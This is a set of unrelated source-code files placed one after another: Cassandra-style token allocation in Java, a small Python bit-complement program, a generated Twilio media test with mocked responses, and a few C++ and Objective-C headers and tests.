// alternatively: return false if the endpoint's ownership is independent of the node we are allocating tokens for
abstract boolean inAllocationRing(InetAddressAndPort other);
final TokenAllocator<InetAddressAndPort> createAllocator()
{
NavigableMap<Token, InetAddressAndPort> sortedTokens = new TreeMap<>();
for (Map.Entry<Token, InetAddressAndPort> en : tokenMetadata.getNormalAndBootstrappingTokenToEndpointMap().entrySet())
{
if (inAllocationRing(en.getValue()))
sortedTokens.put(en.getKey(), en.getValue());
}
return TokenAllocatorFactory.createTokenAllocator(sortedTokens, this, tokenMetadata.partitioner);
}
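        // A chosen token may already be assigned to a node outside this allocation ring (another DC/rack); nudge it with increaseSlightly() until it is free. A clash inside the ring is a configuration error.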
final Collection<Token> adjustForCrossDatacenterClashes(Collection<Token> tokens)
{
List<Token> filtered = Lists.newArrayListWithCapacity(tokens.size());
for (Token t : tokens)
{
while (tokenMetadata.getEndpoint(t) != null)
{
InetAddressAndPort other = tokenMetadata.getEndpoint(t);
if (inAllocationRing(other))
throw new ConfigurationException(String.format("Allocated token %s already assigned to node %s. Is another node also allocating tokens?", t, other));
t = t.increaseSlightly();
}
filtered.add(t);
}
return filtered;
}
final SummaryStatistics replicatedOwnershipStats()
{
SummaryStatistics stat = new SummaryStatistics();
for (Map.Entry<InetAddressAndPort, Double> en : evaluateReplicatedOwnership().entrySet())
{
// Filter only in the same allocation ring
if (inAllocationRing(en.getKey()))
stat.addValue(en.getValue() / tokenMetadata.getTokens(en.getKey()).size());
}
return stat;
}
// return the ratio of ownership for each endpoint
private Map<InetAddressAndPort, Double> evaluateReplicatedOwnership()
{
Map<InetAddressAndPort, Double> ownership = Maps.newHashMap();
List<Token> sortedTokens = tokenMetadata.sortedTokens();
if (sortedTokens.isEmpty())
return ownership;
Iterator<Token> it = sortedTokens.iterator();
Token current = it.next();
while (it.hasNext())
{
Token next = it.next();
addOwnership(current, next, ownership);
current = next;
}
addOwnership(current, sortedTokens.get(0), ownership);
return ownership;
}
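        // Credits the span between two consecutive tokens to every natural replica of that range, using the range midpoint as the representative token.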
private void addOwnership(Token current, Token next, Map<InetAddressAndPort, Double> ownership)
{
double size = current.size(next);
Token representative = current.getPartitioner().midpoint(current, next);
for (InetAddressAndPort n : replicationStrategy.calculateNaturalReplicas(representative, tokenMetadata).endpoints())
{
Double v = ownership.get(n);
ownership.put(n, v != null ? v + size : size);
}
}
}
private StrategyAdapter getOrCreateStrategy(InetAddressAndPort endpoint)
{
String dc = replicationStrategy.snitch.getDatacenter(endpoint);
String rack = replicationStrategy.snitch.getRack(endpoint);
return getOrCreateStrategy(dc, rack);
}
private StrategyAdapter getOrCreateStrategy(String dc, String rack)
{
return strategyByRackDc.computeIfAbsent(dc, k -> new HashMap<>()).computeIfAbsent(rack, k -> createStrategy(dc, rack));
}
private StrategyAdapter createStrategy(String dc, String rack)
{
if (replicationStrategy instanceof NetworkTopologyStrategy)
return createStrategy(tokenMetadata, (NetworkTopologyStrategy) replicationStrategy, dc, rack);
if (replicationStrategy instanceof SimpleStrategy)
return createStrategy((SimpleStrategy) replicationStrategy);
throw new ConfigurationException("Token allocation does not support replication strategy " + replicationStrategy.getClass().getSimpleName());
}
private StrategyAdapter createStrategy(final SimpleStrategy rs)
{
return createStrategy(rs.snitch, null, null, rs.getReplicationFactor().allReplicas, false);
}
private StrategyAdapter createStrategy(TokenMetadata tokenMetadata, NetworkTopologyStrategy strategy, String dc, String rack)
{
int replicas = strategy.getReplicationFactor(dc).allReplicas;
Topology topology = tokenMetadata.getTopology();
// if topology hasn't been set up yet for this dc+rack then treat it as a separate unit
int racks = topology.getDatacenterRacks().get(dc) != null && topology.getDatacenterRacks().get(dc).containsKey(rack)
? topology.getDatacenterRacks().get(dc).asMap().size()
: 1;
if (replicas <= 1)
{
// each node is treated as separate and replicates once
return createStrategy(strategy.snitch, dc, null, 1, false);
}
else if (racks == replicas)
{
// each node is treated as separate and replicates once, with separate allocation rings for each rack
return createStrategy(strategy.snitch, dc, rack, 1, false);
}
else if (racks > replicas)
{
// group by rack
return createStrategy(strategy.snitch, dc, null, replicas, true);
}
else if (racks == 1)
{
return createStrategy(strategy.snitch, dc, null, replicas, false);
}
throw new ConfigurationException(String.format("Token allocation failed: the number of racks %d in datacenter %s is lower than its replication factor %d.",
racks, dc, replicas));
}
// a null dc will always return true for inAllocationRing(..)
// a null rack will return true for inAllocationRing(..) for all nodes in the same dc
private StrategyAdapter createStrategy(IEndpointSnitch snitch, String dc, String rack, int replicas, boolean groupByRack)
{
return new StrategyAdapter()
{
@Override
public int replicas()
{
return replicas;
}
@Override
public Object getGroup(InetAddressAndPort unit)
{
return groupByRack ? snitch.getRack(unit) : unit;
}
@Override
public boolean inAllocationRing(InetAddressAndPort other)
{
return (dc == null || dc.equals(snitch.getDatacenter(other))) && (rack == null || rack.equals(snitch.getRack(other)));
}
};
}
}
| 5,173 |
340 | <gh_stars>100-1000
if __name__ == "__main__":
T = int(input().strip())
correct = 1 << 32
for _ in range(T):
num = int(input().strip())
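        # ~num is -num - 1 in Python; adding 2**32 yields the unsigned 32-bit complement, i.e. num ^ 0xFFFFFFFF.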
print(~num + correct)
| 83 |
1,362 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class PlaybackGrantTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
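        # A mocked 500 response makes the client raise TwilioException, so this test only asserts the shape of the outgoing request.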
with self.assertRaises(TwilioException):
self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().create()
self.holodeck.assert_has_request(Request(
'post',
'https://media.twilio.com/v1/PlayerStreamers/VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/PlaybackGrant',
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "VJcafebabecafebabecafebabecafebabe",
"url": "https://media.twilio.com/v1/PlayerStreamers/VJcafebabecafebabecafebabecafebabe/PlaybackGrant",
"account_sid": "AC<KEY>",
"date_created": "2015-07-30T20:00:00Z",
"grant": {
"playbackUrl": "http://video.net/123/blabla?token=123",
"playerStreamerSid": "VJcafebabecafebabecafebabecafebabe",
"requestCredentials": null
}
}
'''
))
actual = self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().create()
self.assertIsNotNone(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://media.twilio.com/v1/PlayerStreamers/VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/PlaybackGrant',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "<KEY>",
"date_created": "2015-07-30T20:00:00Z",
"url": "https://media.twilio.com/v1/PlayerStreamers/VJcafebabecafebabecafebabecafebabe/PlaybackGrant",
"sid": "VJcafebabecafebabecafebabecafebabe",
"grant": {
"playbackUrl": "http://video.net/123/blabla?token=<PASSWORD>",
"playerStreamerSid": "VJcafebabecafebabecafebabecafebabe",
"requestCredentials": null
}
}
'''
))
actual = self.client.media.v1.player_streamer("VJXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.playback_grant().fetch()
self.assertIsNotNone(actual)
| 1,628 |
2,586 | <reponame>hackers-painters/samurai
//
// ViewController.h
// test
//
// Created by god on 15/4/29.
// Copyright (c) 2015年 Geek-Zoo Studio. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "Samurai.h"
@interface TestSuiteViewController : UIViewController
@property (nonatomic, strong) NSString * testSuite;
@end
| 121 |
1,383 | // =============================================================================
// PROJECT CHRONO - http://projectchrono.org
//
// Copyright (c) 2014 projectchrono.org
// All rights reserved.
//
// Use of this source code is governed by a BSD-style license that can be found
// in the LICENSE file at the top level of the distribution and at
// http://projectchrono.org/license-chrono.txt.
//
// =============================================================================
#ifndef CHFUNCT_H
#define CHFUNCT_H
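// Umbrella header that groups the ChFunction motion-law includes, so a single #include brings in every function type listed below.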
#include "chrono/motion_functions/ChFunction_Const.h"
#include "chrono/motion_functions/ChFunction_ConstAcc.h"
#include "chrono/motion_functions/ChFunction_Derive.h"
#include "chrono/motion_functions/ChFunction_Fillet3.h"
#include "chrono/motion_functions/ChFunction_Integrate.h"
#include "chrono/motion_functions/ChFunction_Matlab.h"
#include "chrono/motion_functions/ChFunction_Mirror.h"
#include "chrono/motion_functions/ChFunction_Mocap.h"
#include "chrono/motion_functions/ChFunction_Noise.h"
#include "chrono/motion_functions/ChFunction_Operation.h"
#include "chrono/motion_functions/ChFunction_Oscilloscope.h"
#include "chrono/motion_functions/ChFunction_Poly345.h"
#include "chrono/motion_functions/ChFunction_Poly.h"
#include "chrono/motion_functions/ChFunction_Ramp.h"
#include "chrono/motion_functions/ChFunction_Recorder.h"
#include "chrono/motion_functions/ChFunction_Repeat.h"
#include "chrono/motion_functions/ChFunction_Sequence.h"
#include "chrono/motion_functions/ChFunction_Sigma.h"
#include "chrono/motion_functions/ChFunction_Sine.h"
#include "chrono/motion_functions/ChFunction_Setpoint.h"
#endif
| 523 |
1,244 | //===----------------------------------------------------------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is dual licensed under the MIT and the University of Illinois Open
// Source Licenses. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
// test <cstdarg>
#include <cstdarg>
#ifndef va_arg
#error va_arg not defined
#endif
#ifndef va_copy
#error va_copy not defined
#endif
#ifndef va_end
#error va_end not defined
#endif
#ifndef va_start
#error va_start not defined
#endif
int main()
{
std::va_list va;
}
| 197 |
389 | <gh_stars>100-1000
//
// UIViewController+QSKit.h
// Q Branch Standard Kit
//
// Created by <NAME> on 10/21/13.
// Copyright (c) 2013 Q Branch LLC. All rights reserved.
//
@import UIKit;
@interface UIViewController (QSKit)
- (BOOL)qs_hasChildViewController;
@end
| 104 |